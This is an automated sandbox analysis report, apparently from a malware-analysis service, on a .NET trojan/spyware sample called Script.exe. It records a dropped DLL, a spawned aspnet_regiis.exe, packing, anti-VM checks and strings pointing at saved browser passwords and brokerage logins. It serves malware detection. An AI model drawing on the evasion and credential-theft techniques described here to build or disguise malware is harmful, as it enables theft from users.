Static PE information: Section: )UHMIO ZLIB complexity 1.0003217725863596

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/7@1/2

Source: C:\Users\user\Desktop\Script.exe

File created: C:\Users\user\AppData\Roaming\gdi32.dll

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7120
Source: C:\Users\user\Desktop\Script.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:120:WilError_03

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\6e45d657-eb9a-43a6-bd66-699a2f1a234c

Jump to behavior

Source: Script.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\Script.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: aspnet_regiis.exe, 00000003.00000003.2143843908.000000000514A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143697152.0000000005167000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Script.exe

Virustotal: Detection: 29%

Source: Script.exe	String found in binary or memory: -addpset
Source: Script.exe	String found in binary or memory: -addfulltrust
Source: Script.exe	String found in binary or memory: -addgroup
Source: Script.exe	String found in binary or memory: -help

Source: C:\Users\user\Desktop\Script.exe

File read: C:\Users\user\Desktop\Script.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Script.exe "C:\Users\user\Desktop\Script.exe"
Source: C:\Users\user\Desktop\Script.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Script.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Source: C:\Users\user\Desktop\Script.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7120 -s 1224
Source: C:\Users\user\Desktop\Script.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Script.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\Script.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\Script.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Script.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Script.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: Script.exe, 00000000.00000002.2391650388.000000000100D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: WERA0F2.tmp.dmp.6.dr
Source:	Binary string: mscorlib.ni.pdb source: WERA0F2.tmp.dmp.6.dr
Source:	Binary string: n0C:\Windows\mscorlib.pdb source: Script.exe, 00000000.00000002.2391418600.0000000000BEA000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: Script.exe, 00000000.00000002.2391650388.0000000000FDD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: Script.exe, 00000000.00000002.2391650388.000000000100D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERA0F2.tmp.dmp.6.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbt source: Script.exe, 00000000.00000002.2391650388.000000000100D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Desktop\Script.PDB source: Script.exe, 00000000.00000002.2391418600.0000000000BEA000.00000004.00000010.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\Script.exe

Unpacked PE file: 0.2.Script.exe.9a0000.0.unpack )UHMIO:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;

Source: Script.exe	Static PE information: section name: )UHMIO
Source: Script.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\Script.exe	Code function: 0_2_009FE260 push eax; mov dword ptr [esp], 282B2A25h	0_2_009FE26F
Source: C:\Users\user\Desktop\Script.exe	Code function: 0_2_009A27BD push ecx; ret	0_2_009A27BE
Source: C:\Users\user\Desktop\Script.exe	Code function: 0_2_009A3F06 push esi; retf	0_2_009A3F1F
Source: C:\Users\user\Desktop\Script.exe	Code function: 0_2_009A212D push esi; iretd	0_2_009A2130
Source: C:\Users\user\Desktop\Script.exe	Code function: 0_2_009A6F78 pushad ; iretd	0_2_009A6F82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_3_02EAC2E3 pushad ; ret	3_3_02EAC309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_3_02EAC2E3 pushad ; ret	3_3_02EAC309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_3_02EAC2E3 pushad ; ret	3_3_02EAC309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_3_02EAD252 push eax; iretd	3_3_02EAD269
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_3_02EAD252 push eax; iretd	3_3_02EAD269
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_3_02EAD252 push eax; iretd	3_3_02EAD269
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_3_02EAD252 push eax; iretd	3_3_02EAD269
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_3_02EADECC push 00000055h; ret	3_3_02EADED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_3_02EADECC push 00000055h; ret	3_3_02EADED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_3_02EADECC push 00000055h; ret	3_3_02EADED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_3_02EADECC push 00000055h; ret	3_3_02EADED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_3_02EACF89 pushfd ; retf	3_3_02EACF8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_3_02EACF89 pushfd ; retf	3_3_02EACF8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_3_02EACF89 pushfd ; retf	3_3_02EACF8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_3_02EAC2E3 pushad ; ret	3_3_02EAC309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_3_02EAC2E3 pushad ; ret	3_3_02EAC309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_3_02EAC2E3 pushad ; ret	3_3_02EAC309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_3_02EAD252 push eax; iretd	3_3_02EAD269
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_3_02EAD252 push eax; iretd	3_3_02EAD269
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_3_02EAD252 push eax; iretd	3_3_02EAD269
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_3_02EAD252 push eax; iretd	3_3_02EAD269
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_3_02EADECC push 00000055h; ret	3_3_02EADED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_3_02EADECC push 00000055h; ret	3_3_02EADED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_3_02EADECC push 00000055h; ret	3_3_02EADED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_3_02EADECC push 00000055h; ret	3_3_02EADED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_3_02EACF89 pushfd ; retf	3_3_02EACF8A

Source: Script.exe

Static PE information: section name: )UHMIO entropy: 7.999726379594664

Source: C:\Users\user\Desktop\Script.exe

File created: C:\Users\user\AppData\Roaming\gdi32.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Script.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: Script.exe PID: 7120, type: MEMORYSTR

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\Script.exe	Memory allocated: 2CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Memory allocated: 2E70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Memory allocated: 4E70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Memory allocated: 54D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Memory allocated: 64D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Memory allocated: 6600000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Memory allocated: 7600000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Memory allocated: 7990000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Memory allocated: 8990000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Memory allocated: 9990000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 1440	Thread sleep time: -240000s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 3176	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\Script.exe

Code function: 0_2_6E0C4872 FindFirstFileExW,

0_2_6E0C4872

Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051E4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.2524886217.0000000002E45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2523525907.0000000002E45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2523525907.0000000002E0D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2524755944.0000000002E0D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051E4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: YNVMware
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
